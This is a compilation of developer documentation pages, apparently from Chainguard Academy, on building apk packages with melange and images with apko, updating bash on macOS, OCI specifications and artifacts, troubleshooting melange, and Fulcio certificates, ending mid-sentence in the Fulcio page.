melange is an apk builder tool that uses declarative pipelines to create apk packages. From a single YAML file, users are able to generate multi-architecture apks that can be injected directly into apko builds. Understanding melange can help you better understand the Wolfi operating system and how Chainguard Containers are made to be minimal and secure, but it is not necessary to have a background in melange in order to use Chainguard Containers. In this guide, you’ll learn how to build a software package with melange.
To demonstrate the versatile combination of melange and apko builds, we’ll package a small command-line PHP script and build a minimalist container image based on Wolfi with the generated apk. All files used in this demo are open source and available at the melange-php-demos repository. Requirements Our guide is compatible with operating systems that support Docker and shared volumes. Please follow the appropriate Docker installation instructions for your operating system. You won’t need PHP or Composer installed on your system, since we’ll be using Docker to build the demo app. Note for Linux Users In order to be able to build apks for multiple architectures using Docker, you may need to register additional QEMU headers within your kernel. This is done automatically for Docker Desktop users, so if you are on macOS you don’t need to run this additional step. Run the following command to register the necessary handlers within your kernel, using the multiarch/qemu-user-static image. docker run --rm --privileged multiarch/qemu-user-static --reset -p yes You should now be able to build apks for all architectures supported by melange. 1 — Downloading the melange Image The fastest way to get melange up and running on your system is by using the official melange image with Docker. Start by pulling the melange image into your local system: docker pull cgr.dev/chainguard/melange:latest This will download the latest version of the melange image, which is rebuilt every night for extra freshness. Check that you’re able to run melange with docker run. docker run --rm cgr.dev/chainguard/melange version You should get output similar to the following: __ __ _____ _ _ _ _ ____ _____ | \/ | | ____| | | / \ | \ | | / ___| | ____| | |\/| | | _| | | / _ \ | \| | | | _ | _| | | | | | |___ | |___ / ___ \ | |\ | | |_| | | |___ |_| |_| |_____| |_____| /_/ \_\ |_| \_| \____| |_____| melange GitVersion: v0.11.1 GitCommit: a52edcc075ebf1dc89aea87893e3821944171ee3 GitTreeState: clean BuildDate: '2024-07-19T16:04:17Z' GoVersion: go1.22.5 Compiler: gc Platform: linux/amd64 With melange installed, you’re ready to proceed. 2 — Cloning the Demo Repository To demonstrate melange’s features with a minimalist application that has real-world functionality, our demo consists of a PHP command line app that queries the Slip advice API and outputs a random piece of advice. The app is a single-file script built with Minicli. Start by cloning the demo repository to your local machine and navigating to the melange-php-demos/hello-minicli directory: git clone git@github.com:chainguard-dev/melange-php-demos.git cd melange-php-demos/hello-minicli Run the following command, which will use the official Composer image to generate a composer.json file and download minicli/minicli: docker run --rm -it -v "${PWD}":/app composer require minicli/minicli Once you receive confirmation that the download was completed, you’ll need a second dependency to query the Advice Slip API. Run the following command to include minicli/curly, a curl wrapper for Minicli: docker run --rm -it -v "${PWD}":/app composer require minicli/curly Now you can run the application to make sure it’s functional. You can do that using Docker and Chainguard’s PHP image: docker run --rm -it -v "${PWD}":/app cgr.dev/chainguard/php /app/minicli advice You should get a random piece of advice such as: Gratitude is said to be the secret to happiness. With the application ready, you can start building your package. 
3 — The melange YAML File

The melange.yaml file is where you declare the details and specifications of your apk package. For code that generates self-contained binaries, this is typically where you’ll build your application artifacts with compiler tools. In the case of interpreted languages, you’ll likely build your application by downloading vendor dependencies, setting up relevant paths, and setting the environment up for production.

The melange specification file contains three main sections:

- package: defines package specs, such as name, license, and runtime dependencies. Runtime dependencies will be brought into the system automatically as dependencies when the apk is installed.
- environment: defines how the environment should be prepared for the build, including required packages and their source repositories. Anything that is only required at build time goes here, and shouldn’t be part of the runtime dependencies.
- pipeline: defines the build pipeline for this package.

One of the biggest advantages of using melange is being able to control all steps of your build pipeline, and include only what’s necessary. This way, you’ll be able to build smaller and more secure container images by removing unnecessary dependencies. This is what the melange.yaml included in our demo looks like, for your reference:

```yaml
package:
  name: hello-minicli
  version: 0.1.0
  description: Minicli melange demo
  target-architecture:
    - all
  copyright:
    - license: MIT
  dependencies:
    runtime:
      - php
      - php-curl

environment:
  contents:
    keyring:
      - https://packages.wolfi.dev/os/wolfi-signing.rsa.pub
      - ./melange.rsa.pub
    repositories:
      - https://packages.wolfi.dev/os
    packages:
      - ca-certificates-bundle
      - busybox
      - curl
      - git
      - php
      - php-phar
      - php-iconv
      - php-openssl
      - php-curl
      - composer

pipeline:
  - name: Build Minicli application
    runs: |
      MINICLI_HOME="${{targets.destdir}}/usr/share/minicli"
      EXEC_DIR="${{targets.destdir}}/usr/bin"
      mkdir -p "${MINICLI_HOME}" "${EXEC_DIR}"
      cp ./composer.json "${MINICLI_HOME}"
      /usr/bin/composer install -d "${MINICLI_HOME}" --no-dev
      cp ./minicli "${EXEC_DIR}"
      chmod +x "${EXEC_DIR}/minicli"
```

Our build pipeline will set up two distinct directories, separating the application dependencies from its executable entry point. The executable minicli script will be copied into /usr/bin, while the vendor files will be located at /usr/share/minicli.

4 — Building the minicli apk with melange

Before building the package, you’ll need to create a temporary keypair to sign it. You can use the following command for that:

```sh
docker run --rm -v "${PWD}":/work cgr.dev/chainguard/melange keygen
```

This will generate melange.rsa and melange.rsa.pub files in the current directory.

```
2024/08/01 16:55:31 INFO generating keypair with a 4096 bit prime, please wait...
2024/08/01 16:55:33 INFO wrote private key to melange.rsa
2024/08/01 16:55:33 INFO wrote public key to melange.rsa.pub
```

Next, build the apk defined in the melange.yaml file with the following command:

```sh
docker run --privileged --rm -v "${PWD}":/work \
  cgr.dev/chainguard/melange build melange.yaml \
  --arch amd64,aarch64 \
  --signing-key melange.rsa
```

This will set up a volume sharing your current folder with the location /work inside the container. We’ll build packages for amd64 and aarch64 platforms and sign them using the melange.rsa key created in the previous command.
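Once the build completes, you can optionally sanity-check what was packaged before moving on. An apk is essentially a gzipped tarball, so a quick listing gives a rough view of its contents; this is only a sketch, and the path below assumes the x86_64 output of the build above.

```sh
# List the files inside the freshly built package (path from this demo's build).
tar -tzf packages/x86_64/hello-minicli-0.1.0-r0.apk
```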
You should now find a packages folder containing the generated apks (and associated apk index files):

```
packages
├── aarch64
│   ├── APKINDEX.json
│   ├── APKINDEX.tar.gz
│   └── hello-minicli-0.1.0-r0.apk
└── x86_64
    ├── APKINDEX.json
    ├── APKINDEX.tar.gz
    └── hello-minicli-0.1.0-r0.apk

3 directories, 6 files
```

You have successfully built a multi-architecture software package with melange!

5 — Building a Container Image with apko

With the apk packages and apk index in place, you can now build a container image and have your apk(s) installed within it. The following apko.yaml file will create a container image tailored to the application we built in the previous steps. Because we defined the PHP dependencies as runtime dependencies within the apk, you don’t need to require these packages again here. The container entrypoint command will be set to /usr/bin/minicli, where the application executable is located.

One important thing to note is how we reference the hello-minicli apk as a local package within the repositories section of the YAML file. The @local notation tells apko to search for apks in the specified directory, in this case /work/packages. This is what the apko.yaml file included in our demo looks like, for your reference:

```yaml
contents:
  keyring:
    - https://packages.wolfi.dev/os/wolfi-signing.rsa.pub
    - ./melange.rsa.pub
  repositories:
    - https://packages.wolfi.dev/os
    - '@local /work/packages'
  packages:
    - wolfi-base
    - ca-certificates-bundle
    - hello-minicli@local

accounts:
  groups:
    - groupname: nonroot
      gid: 65532
  users:
    - username: nonroot
      uid: 65532
  run-as: 65532

entrypoint:
  command: /usr/bin/minicli advice
```

The following command will set up a volume sharing your current folder with the location /work in the apko container, running the apko build command to generate an image based on your apko.yaml definition file.

```sh
docker run --rm --workdir /work -v ${PWD}:/work cgr.dev/chainguard/apko \
  build apko.yaml hello-minicli:test hello-minicli.tar --arch host
```

This will build an OCI image based on your host system’s architecture (specified by the --arch host flag). If you receive warnings at this point, those are likely related to the types of SBOMs being uploaded and can be safely ignored. The command will generate a few new files in the app’s directory:

- hello-minicli.tar — the packaged OCI image that can be imported with a docker load command
- sbom-%host-architecture%.spdx.json — an SBOM file for your host architecture in spdx-json format

Next, load your image within Docker:

```
docker load < hello-minicli.tar
7cbaefdf1c30: Loading layer  13.7MB/13.7MB
Loaded image: hello-minicli:test-%host-architecture%
```

Note that the %host-architecture% will vary, and there may be multiple images loaded into your Docker daemon. Be sure to edit the variable in the following docker run command to match your target architecture. Now you can run your Minicli program with:

```sh
docker run --rm hello-minicli:test-%host-architecture%
```

The demo should output an advice slip such as:

```
Only those who attempt the impossible can achieve the absurd.
```

You have successfully built a minimalist container image with your apk package installed on it. This image is fully OCI compatible and can be signed with Cosign for provenance attestation.

Conclusion

In this guide, we packaged a PHP command-line app with melange. We also built a container image to install and run our custom apk, using the apko tool. For more information about apko, check our Getting Started with apko guide.
The demo files are available at the melange-php-demos repository, in the hello-minicli subfolder. For additional information on how to debug your builds and other features, check the melange and apko repositories on GitHub.

---

### Getting Started with apko

URL: https://edu.chainguard.dev/open-source/build-tools/apko/getting-started-with-apko/
Last Modified: May 2, 2024
Tags: apko, Procedural

apko is a command-line tool to build container images using a declarative language based on YAML. apko is so named as it uses the apk package format and is inspired by the ko build tool. It is part of the open source tooling Chainguard developed to create the Wolfi operating system which is used in Chainguard Containers.

Why apko

Container images are typically assembled in multiple steps. A tool like Docker, for example, combines building steps (as in, running commands to copy files, build and deploy applications) and composition (as in, composing a base image with pre-built packages) in a single piece of software. apko, on the other hand, is solely a composition tool that focuses on producing lightweight, “flat” base images that are fully reproducible and contain auto-generated SBOM files for every successful build. Instead of building your application together with your components and system dependencies, you can build your application once and compose it into different architectures and distributions, using a tool such as melange in combination with apko. For more information on how melange and apko work together, you can check this blog post: Secure your Software Factory with melange and apko.

In this guide, we’ll learn how to use apko to build a base Wolfi image.

Requirements

The fastest way to get apko up and running on your system is by using the official apko image with Docker. This method is compatible with all operating systems that support Docker and shared volumes. Please follow the appropriate Docker installation instructions for your operating system. If you want to run apko on CI/CD pipelines built on top of GitHub Actions, check the apko build action on GitHub. The instructions in this document were validated on an Ubuntu 22.04 workstation running Docker 20.10.

Step 1 — Download the apko Image

Start by pulling the official apko image into your local system:

```sh
docker pull cgr.dev/chainguard/apko
```

This will download the latest version of the distroless apko image, which is rebuilt every night for extra freshness. Check that you’re able to run apko with:

```sh
docker run --rm cgr.dev/chainguard/apko version
```

You should get output similar to this:

```
    _      ____    _  __   ___
   / \    |  _ \  | |/ /  / _ \
  / _ \   | |_) | | ' /  | | | |
 / ___ \  |  __/  | . \  | |_| |
/_/   \_\ |_|     |_|\_\  \___/
apko

GitVersion: v0.6.0
...
```

In the next step, you’ll build your first apko image.

Step 2 — Build a Test Image

To test that you’re able to build images, you can use one of the example yaml definition files that are included in the official apko code repository. Here we’ll use the wolfi-base.yaml for demonstration. Create a new folder to save your image files, then move to that directory:

```sh
mkdir ~/apko
cd ~/apko
```

Next, create a file named wolfi-base.yaml to save your image definition.
You can use nano for that:

```sh
nano wolfi-base.yaml
```

The wolfi-base.yaml example image is defined as follows:

```yaml
contents:
  keyring:
    - https://packages.wolfi.dev/os/wolfi-signing.rsa.pub
  repositories:
    - https://packages.wolfi.dev/os
  packages:
    - ca-certificates-bundle
    - wolfi-base

entrypoint:
  command: /bin/sh -l

archs:
  - x86_64
```

The contents node is used to define allowed package sources and which packages should be included in the image. Here we’ll be using only packages from the main Wolfi APK repository. In the packages section, we require the wolfi-base package, which is a meta-package to set up a bare minimum Wolfi system. The command field within the entrypoint node defines the image entry point command /bin/sh -l, which will land you in a shell prompt whenever the image is executed. Finally, the archs node specifies that this image will be built for the x86-64 architecture.

Save and close the file after you’re done including these contents. With nano, you can do that by pressing CTRL+X, then confirming with Y and ENTER.

The only thing left to do now is run apko to build this image. The following build command will:

- set up a volume share in the current directory, synchronizing its contents with apko’s image workdir; this way, the generated artifacts will be available on your host system.
- execute the cgr.dev/chainguard/apko image with the build command, tagging the image as wolfi-base:test and saving the build as wolfi-test.tar.

```sh
docker run --rm -v ${PWD}:/work -w /work cgr.dev/chainguard/apko build wolfi-base.yaml wolfi-base:test wolfi-test.tar
```

You should get output similar to this:

```
. . .
Mar 15 20:17:02.023 [INFO] [arch:x86_64] Building images for 1 architectures: [amd64]
Mar 15 20:17:02.023 [INFO] [arch:x86_64] building tags [wolfi-base:test]
. . .
Mar 15 20:17:04.261 [INFO] loading config file: wolfi-base.yaml
Mar 15 20:17:04.416 [INFO] [arch:x86_64] adding amd64 to index
Mar 15 20:17:04.419 [INFO] [arch:x86_64] Generating index SBOM
Mar 15 20:17:04.420 [INFO] [arch:x86_64] Final index tgz at: wolfi-test.tar
```

From the output, you can notice that the image was successfully built as wolfi-test.tar in the container, which is shared with your local folder on the host thanks to the volume you created when running the docker run command.

Step 3 — Test the Image with Docker

To test the generated image with Docker, you’ll need to use the docker load command and import the .tar file you created in the previous step:

```sh
docker load < wolfi-test.tar
```

You’ll get output like this:

```
bf6e72d71c13: Loading layer [==================================================>]  5.491MB/5.491MB
Loaded image: wolfi-base:test-amd64
```

You can check that the image is available at the host system with:

```sh
docker image list
```

You should be able to find the wolfi-base image with the test-amd64 tag among the results. Now you can run the image with:

```sh
docker run -it wolfi-base:test-amd64
```

This will get you into a container running the apko-built image wolfi-base:test-amd64. It’s a regular shell that you can explore to see what’s included - just keep in mind that this is a minimalist image with only the base Wolfi system. To include additional software packages, check the Wolfi repository to find the packages you’ll need for your specific use case, or check out melange, apko’s companion project that allows users to build their own APK packages from source.

Conclusion

In this guide, you learned what apko is and what makes it a powerful resource in your cloud-native tooling.
If you need help debugging your build, check our Troubleshooting apko page for more information. Check the official apko repository if you want to report an issue or suggest new features. --- ### Updating bash on macOS URL: https://edu.chainguard.dev/open-source/update-bash-macos/ Last Modified: June 9, 2022 The bash release included with macOS (v3.2) needs to be updated for Chainguard scripts. You’ll need to install a newer release and ensure it appears before /bin/bash in $PATH. Prerequisites We’ll want to check the version of bash, and also ensure that the Homebrew package manager is installed. If you know your bash version is below 4 and that you have Homebrew installed, you can skip this section. First, make sure your version is version 3.2 and that it hasn’t been updated. bash --version You’ll receive output similar to the following: GNU bash, version 3.2.57(1)-release (arm64-apple-darwin21) Copyright (C) 2007 Free Software Foundation, Inc. If your output is anything lower than version 4, as above, you’ll need to install a newer version of bash. Next, you’ll need to have Homebrew installed as a package manager for your macOS machine. You can read more about Homebrew from their official site. You can check whether Homebrew is already installed by checking its version: brew --version If you don’t get output of a version number (such as Homebrew 3.4.4), you can install Homebrew with the following command: /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)" With Homebrew installed and set up, you’re ready to update bash on macOS. Update Homebrew and Install a Newer Version of bash Let’s update Homebrew to ensure we have the most recent version and go ahead and install Homebrew’s most recent version of bash. brew update && brew install bash You should get output regarding updated packages. At this point, you should be able to check to see which versions of bash you currently have installed. List all the available versions with which and the “all” -a flag. which -a bash Your output will likely be two different versions of bash — the one that was preinstalled on your machine, and the new Homebrew version. /opt/homebrew/bin/bash /bin/bash However, if you run which bash without a flag, you will likely just receive the /bin/bash output, which means your machine is still using the preinstalled bash rather than the one you just added with Homebrew. We need to modify this. Update Bash Profile In order to call the right version of bash, you’ll need to update your bash profile. In most macOS machines, you should be able to find this under ~/.bash_profile. You can edit this with Vi, for example. vi ~/.bash_profile In the file, you’re going to want to add a line that sets up the PATH to direct to the Homebrew directory that you received above from the which -a bash output. export PATH="/opt/homebrew/bin:$PATH" In our case, the new bash was in the directory path of /opt/homebrew/bin so we have exported that to PATH, as above. After inserting the line, you may save and quit Vi. At this point, you can either restart your Terminal or source your Bash Profile so that the changes take place. Let’s do the latter. source ~/.bash_profile Once you have done this, you should get a clear command prompt. Verify macOS is Using the New Version of bash With your PATH updated, you should be able to use the new version of bash on your macOS machine. You can confirm that your operating system is pulling the correct version by running the which command again. 
which bash Your output now should reflect the path where Homebrew installed the new version of bash and that you added to the Bash Profile. In our example, our output would be the following. /opt/homebrew/bin/bash You can further confirm that you’re using the updated bash by checking the version. bash --version You should receive output indicating that you are using version 4 or 5 of bash. GNU bash, version 5.1.16(1)-release (aarch64-apple-darwin21.1.0) Copyright (C) 2020 Free Software Foundation, Inc. ... If you are not pulling from the correct location or are not running the expected version, please review the steps above to ensure that you did not introduce extra characters. Your Homebrew package manager may be configured to a different path; ensure that it is set up as you expect. --- ### What is the Open Container Initiative? URL: https://edu.chainguard.dev/open-source/oci/what-is-the-oci/ Last Modified: June 9, 2022 Tags: OCI, Conceptual The Open Container Initiative (OCI) is a Linux Foundation project dedicated to managing specifications and projects related to the storage, distribution, and execution of container images. The OCI was formed in 2015 when developers recognized that the quickly growing container industry needed standards to ensure the portability of containers across systems and platforms. As one of the most popular container developers, Docker was a key partner in the formation of the OCI and donated its specifications and associated code for OCI image formats and runtime specifications. Today, the OCI manages three specifications (the Image Specification, the Runtime Specification, and the Distribution Specification), which are evolving according to community participation and industry development. The OCI is committed to promoting common, minimal, and open standards and specifications with the aim of protecting interoperability without sacrificing developers’ ability to innovate. These standards and specifications play a critical role in enabling developers to trust that their containers will work regardless of the infrastructure, cloud provider, and DevOps tooling they choose to use. They also are vital in modern software supply chain security as they provide a strong foundation for developing security tooling and best practices related to container technology. Understanding the purpose and use of OCI specifications can help you understand the conditions of container interoperability and prepare you to learn emerging methods for securing and trusting container applications. What are the OCI Specifications? The OCI currently manages three specifications: the Runtime Specification, the Image Specification, and the Distribution Specification. These specifications work together to ensure that any OCI-compliant image can be run on any OCI-compliant runtime, and that OCI-compliant registries (such as Docker, Amazon Elastic Container Registry, or Google Container Registry) are able to distribute OCI images according to OCI guidelines. The OCI offers a testing and peer validation process for individuals and organizations to certify their images or runtime software as OCI compliant. You can find information about the certification process on the OCI website. The three OCI specifications are outlined in the following sections. OCI Image Format Specification This specification defines an OCI Image as consisting of an image manifest, an optional image index, a set of filesystem layers, and a configuration. 
Image manifest This document provides a configuration and set of layers for a single container image for a specific architecture and operating system. Note that the manifest specification has three goals: Enabling content-addressable images, which means an image can be referred to by a unique ID — or digital fingerprint — that is generated by hashing its contents. Hashing is generated using the SHA256 algorithm, which generates a unique 32-byte signature for an image based on the contents of the image. Changing even one byte on the original image would result in a different hash, enabling developers to know with certainty that an image has not been altered. Allowing multi-architecture images, or container images that can be used with different architectures such as AMD64 and ARM. Multi-architecture images enable a flexible approach to developing a container-based application or setting up CI/CD workflows without needing to commit to a specific architecture. Ensuring that images are compatible with any OCI-compliant runtime. For an example manifest document and a list of properties, you can read the OCI’s Image Manifest Specifications. Image index (optional) This document is an optional higher-level manifest which allows developers to point to multiple image manifests to allow compatibility with a variety of architectures and operating systems. For an example image index and a list of properties, you can read the OCI’s Image Index specifications. A set of filesystem layers An image is composed of one or more filesystem layers, each of which represent a change to the file system such as the addition of another image or one or more commands. These layers are unpacked by the container engine to build the image and are referred to by their digest, a hash generated by applying the SHA 256 algorithm to their contents. Layers are described in the image manifest as follows: "layers": [ { "mediaType": "application/vnd.oci.image.layer.v1.tar+gzip", "size": 32654, "digest": "sha256:9834876dcfb05cb167a5c24953eba58c4ac89b1adf57f28f2f9d09af107ee8f0" }, ] For OCI guidance on filesystem layers, you can visit their Image Layer Filesystem Changeset Documentation. Configuration The configuration document includes basic information like the author and creation date and describes execution parameters for translating the image to a container runtime. The configuration file is named after its cryptographic hash and can be located in the manifest as follows: { "schemaVersion": 2, "mediaType": "application/vnd.oci.image.manifest.v1+json", "config": { "mediaType": "application/vnd.oci.image.config.v1+json", "size": 7023, "digest": "sha256:b5b2b2c507a0944348e0303114d8d93aaaa081732b86451d9bce1f432a537bc7" }, For more guidance on image configuration, visit the official OCI documentation. Runtime Specification A container runtime is the software used to run and manage containers; essentially they create and run containers using specified images. The goal of the OCI Runtime Specification is to ensure consistency between different runtime environments and define common actions to manage a container’s lifecycle. An OCI-compliant image should run reliably on any OCI-compliant runtime. More information about the Runtime Specification can be found in the OCI documentation. In addition to overseeing this specification, OCI develops the runtime runc, a command line client for creating, configuring, and managing containers. 
Originally developed by Docker, runc was donated to OCI as the reference for the specification and serves as the foundation for a variety of popular container tools such as containerd and Podman. Distribution Specification The OCI Distribution Specification aims to standardize the way container registries and runtime tools push and pull container images and other content types. It is based on the specification for the Docker Registry HTTP API V2 protocol apdx-1, and has been adopted by major registries such as Amazon Elastic Container Registry, Google Container Registry, Azure Container Registry, and Github Container Registry. Any registry that is OCI-compliant supports interactions outlined by this specification, such as pushing, pulling, or storing images. More information about the Distribution Specification can be found in the OCI documentation here. How to know if an image is OCI compliant Currently, most images encountered in the wild are either OCI or Docker images. You can determine whether an image is OCI compliant by inspecting the mediatype value located in the image’s manifest. If “oci” is included in the string set as the value of the mediatype, then it is an OCI image: "mediaType": "application/vnd.oci.image.manifest.v1+json", Otherwise, the mediatype string will likely include “docker” as follows: "mediaType": "application/vnd.docker.distribution.manifest.v2+json" There are a few interesting nuances about OCI images that are worth pointing out. First, because Docker donated its image specifications to OCI, Docker and OCI image specifications are the same in substance. In fact, most images on Docker are Docker images and not OCI images, which you can confirm by inspecting the image manifests. This is largely due to the fact that Docker’s tools for publishing and building images create Docker images – not OCI images — by default, a convention set by historical practice. If you want to build and publish OCI images, you must use tools that support OCI, such as apko, an open source OCI image builder. Relatedly, a final nuance to point out is that OCI-compliant registries are only required to support OCI images, but may distribute other image types as well. Thus, you should not expect all images distributed on an OCI-compliant registry to be OCI compliant themselves, such as evidenced by Docker Hub in the example above. Wrap up You should now understand the purpose of OCI and the three container specifications it oversees. While the OCI’s core function is protecting interoperability across the complex container ecosystem, its protocols are being recognized as useful for signing software, a method for authenticating that the software is from a trusted source and has not been tampered with by a third party. You can learn more about container signing and how to sign, verify, and store image artifacts in an OCI registry in our introductory guide to Cosign. --- ### What are OCI Artifacts? URL: https://edu.chainguard.dev/open-source/oci/what-are-oci-artifacts/ Last Modified: June 9, 2022 Tags: OCI, Conceptual OCI artifacts are a way of using OCI registries, or container registries that are compliant with specifications set by the Open Container Initiative, to store arbitrary files. They are useful to understand given their growing importance for software supply chain security and their general utility for container engineering. However, community usage of OCI artifacts is still actively evolving and differing opinions and understandings of their purpose can lead to confusion. 
In this guide, you will learn the difference between OCI "artifacts" and "Artifacts," their utility for software supply chain security, and some important considerations when using them.

OCI "artifacts" versus "Artifacts"

The term "OCI artifact" is a general-purpose way of referring to any object stored within a container registry, but is most often used to refer to objects stored in registries that are not images. Container registries were originally designed to store and distribute images, but software engineers soon saw their utility for storing non-image objects such as Helm charts, Tekton bundles, and policy modules. By storing these objects in the same infrastructure as their containers, software engineers are able to consolidate their security and management efforts. Another benefit of using OCI registries for artifacts is that registries provide a content-addressable API, or a way of referring to files (like images and artifacts) that assures their authenticity and integrity.

OCI artifacts are sometimes misunderstood as a new OCI specification or format, but they are in fact a way of using the OCI Image Specification to store something other than an image in a container registry. Some software projects use OCI registries to store non-images without making any formal changes to the object's manifest. However, the OCI does provide guidance for formally specifying an object as an "OCI Artifact" (note the capital "A") by modifying its manifest in a particular way. According to the OCI Image Specification, an image manifest needs to include the OCI mediaType values application/vnd.oci.image.config.v1+json and application/vnd.oci.image.layer.v1.tar+gzip in the config and layers fields. When creating a manifest for an OCI Artifact, however, you switch out both of these values with custom mediaType values as in the example below.

{
  "schemaVersion": 2,
  "config": {
    "mediaType": "application/vnd.yourcustomartifact+json",
    "size": 233,
    "digest": "sha256:..."
  },
  "layers": [{
    "mediaType": "application/vnd.yourcustomartifact.tar.gzip",
    "size": 680,
    "digest": "sha256:..."
  }]
}

In the example manifest above, the config field contains the custom mediaType value application/vnd.yourcustomartifact+json and the layers field contains the custom mediaType value application/vnd.yourcustomartifact.tar.gzip. Some container tools make use of the OCI Artifacts format guidelines (such as Helm and Tekton), but using these guidelines comes with a serious drawback. Not all registries support OCI Artifacts (or manifests with a custom mediaType), and the OCI Image Specification recommends avoiding the use of Artifacts if you are concerned about portability. As you will read about in the section below, this lack of portability is a reason why some software projects choose to store artifacts in an OCI registry without adding a custom mediaType to the manifest.

OCI artifacts and software supply chain security

For software supply chain security, OCI artifacts offer a useful way to store SBOMs and signatures inside a container registry. An SBOM, or software bill of materials, is a formally structured list of the libraries, modules, licensing, and version information that make up any given piece of software. When a security advisory is issued, SBOMs enable software operators to quickly understand whether their codebase contains any components associated with the vulnerability described in the advisory.
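As a concrete illustration of the SBOM use case, here is a hedged sketch of attaching and retrieving an SBOM stored alongside an image using Cosign; the image reference is a placeholder, and the commands assume Cosign is installed and that you can push to the registry:

```sh
# Attach an SPDX SBOM to an image in the registry (image reference is a placeholder)
cosign attach sbom --sbom sbom.spdx.json registry.example.com/myorg/myapp:1.0.0

# Later, pull the SBOM back out of the registry for inspection
cosign download sbom registry.example.com/myorg/myapp:1.0.0 > downloaded-sbom.spdx.json
```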
A signature is a way of attesting to the fact that you are the author of your software, and it enables the consumer to verify that the signature and software have not been tampered with by a third party. The open source tool Cosign, part of the Sigstore project, enables software engineers to store their SBOMs and signatures as artifacts in the same container registry where they store their associated images. However, given the lack of support for OCI Artifacts across registries, Cosign ships all SBOM and signature artifacts as OCI Images and not as OCI Artifacts. In this way, software engineers can take advantage of Cosign regardless of whether their container registry supports the OCI Artifact manifest format or not. To learn more about storing signatures as artifacts, visit the section on counter signing in the Cosign repo. To learn more about storing SBOMs as artifacts, visit the Cosign SBOM Specification page on GitHub or the section on signing SBOMs in Sigstore's documentation.

Considerations

Community usage and guidance around OCI artifacts and Artifacts are actively evolving, and there are a few considerations to keep in mind when you are planning on using them. As noted earlier, not all registries support OCI Artifacts, and the OCI Image Specification recommends avoiding the use of them if you are concerned about portability. Recommended practices are also still under debate, giving rise to the OCI Reference Types Working Group, which is considering different ways of describing and handling objects stored in an OCI registry. You can read more about the proposals the group is currently considering by visiting the Intro to OCI Reference Types post on Chainguard's blog.

---

### Troubleshooting melange Builds

URL: https://edu.chainguard.dev/open-source/build-tools/melange/troubleshooting/
Last Modified: August 10, 2022
Tags: melange, Troubleshooting

Debug Options

To include debug-level information on melange builds, edit your melange.yaml file and include set -x in your pipeline. You can add this at any point in your pipeline commands to further debug a specific section of your build.

...
pipeline:
  - name: Build Minicli application
    runs: |
      set -x
      APP_HOME="${{targets.destdir}}/usr/share/hello-minicli"
...

Common Errors

When melange is unable to finish a build successfully, you will get an error similar to this:

Error: failed to build package: unable to run pipeline: exit status 127

The build could not be completed due to an error at some point in your pipeline. Enable debugging by including set -x at the beginning of your build pipeline so that you can nail down where the issue occurs.

Missing QEMU user-space emulation packages

Linux users using the Docker melange image may get errors when building packages for architectures other than x86 and x86_64. This won't happen for Docker Desktop users, since the additional architectures are automatically enabled upon installation. To enable additional architectures, you'll need to enable them within your kernel with the following command:

docker run --rm --privileged multiarch/qemu-user-static --reset -p yes

An alternate approach to achieve the same result is to run the following command:

docker run --privileged --rm tonistiigi/binfmt --install all

Missing build-time dependencies

You may get errors from missing build-time dependencies such as busybox. In this case you may get "No such file or directory" errors when enabling debug with set -x.
To fix this, you’ll need to locate which package has the commands that your build needs, and add it to the list of your build-time dependencies. Further Resources For additional guidance, please refer to the melange repository on GitHub, where you can find more examples or open an issue in case of problems. --- ### An Introduction to Fulcio URL: https://edu.chainguard.dev/open-source/sigstore/fulcio/an-introduction-to-fulcio/ Last Modified: August 19, 2022 Tags: Fulcio, Overview An earlier version of this material was published in the Fulcio chapter of the Linux Foundation Sigstore course. Fulcio is a certificate authority that binds public keys to identities such as email addresses (such as a Google account) using OpenID Connect, essentially notarizing a short-lived key pair against a particular login. A certificate authority issues digital certificates that certify that a particular public key is owned by a particular entity. The certificate authority therefore serves as a trusted third party, helping parties that need to attest and verify identities. By connecting their identity to a verified email or other unique identifier, Fulcio enables software developers to confirm certain credentials associated with themselves. Developers can attest that they truly did create their signed artifacts and later software consumers can then verify that the software artifacts they use really did come from the expected software developers. Certificates A certificate is a signed document that associates a public key with an identity such as an email address. The term “document” refers to a file or any electronic representation of a paper document. That the document must be signed implies that some party uses a digital signature to certify the document. You could think of a certificate as the digital equivalent of a passport: a document from a trusted authority that links information to an identity. Fulcio issues X.509 certificates. X.509 certificates are an International Telecommunication Union (ITU) standard that defines the format of public keys, and they are commonly used in many internet protocols, such as those that enable HTTPS. These certificates are what bind a given identity to a public key by using a digital signature. Below is an example of an X.509 certificate used to authenticate a secure website connection. Certificate Authority You rely on certificate authorities every time you open a browser and make a connection to a website. These certificate authorities, such as Let’s Encrypt, sign certificates that link a particular domain with a particular public key, allowing users to use HTTPS securely, knowing that a malicious third party is not pretending to be the real website. When a user visits a website, the user’s browser checks that a certificate authority trusted by the browser vouches for that certificate. As a certificate authority, Fulcio operates analogously to the certificate authorities that are responsible for web encryption. Fulcio does not, however, tie website domains to public keys. Instead, Fulcio creates and signs certificates that bind together email addresses and public keys. Binding an email address and public key is critical to how Sigstore works. Software developers want to attest that they were indeed responsible for publishing a particular software artifact. Fulcio lets these developers issue claims associated with their public identity. 
As a result, software consumers can later check the end-to-end integrity of the software artifacts they consume and know that this artifact was indeed created by the party that claims to have produced that artifact. To return to the digital passport metaphor, each national government, the entities that issue passports, is equivalent to a certificate authority. OpenID Connect (OIDC) Tokens OpenID Connect (or OIDC) is a protocol that enables authentication without the service provider having to store and manage passwords. Authentication refers to establishing that the person operating an application or using a browser is who they claim to be. Allowing the service, like Sigstore, to rely on OIDC means that the service transfers responsibility of authenticating the subject to other OIDC providers like GitHub, Google, and Microsoft, solving the key management issues that many online service providers prefer to avoid. The use of the OIDC protocol by Sigstore means that a user can rely on workflows they are already familiar with, such as logging into Google, in order to prove their identity. The OIDC “provider” (Google in this example) then vouches on the user’s behalf to Fulcio that the user is who they say they are. Returning again to the digital passport metaphor, the OIDC protocol is similar to how a passport can be used at an airport to prove your identity. The airport did not issue the passport (that is, the certificate) but it trusts the proof provided via the certificate. How Fulcio Issues Certificates The user initiates a login to Fulcio using an OIDC provider such as GitHub, Google, or Microsoft. The user and an OIDC provider (for instance, GitHub) then engage in the OIDC protocol where the user logs in to GitHub to prove their identity. The OIDC provider, if the login is successful, returns an “access token,” which proves to Fulcio that the user controls the email address they claim to control. Fulcio then creates a certificate and timestamps it, returning the timestamp to the user and placing the certificate in the Rekor transparency log too. The process described above, in reality, can be decomposed into even more steps. For a full understanding with helpful diagrams, consult the Fulcio documentation. The Purpose and Contributions of Fulcio The main task of Fulcio is to link public keys to email addresses. The detailed explanation earlier simply elaborates on how Fulcio binds public keys to email addresses. Why bind public keys to email addresses? Because third parties want to 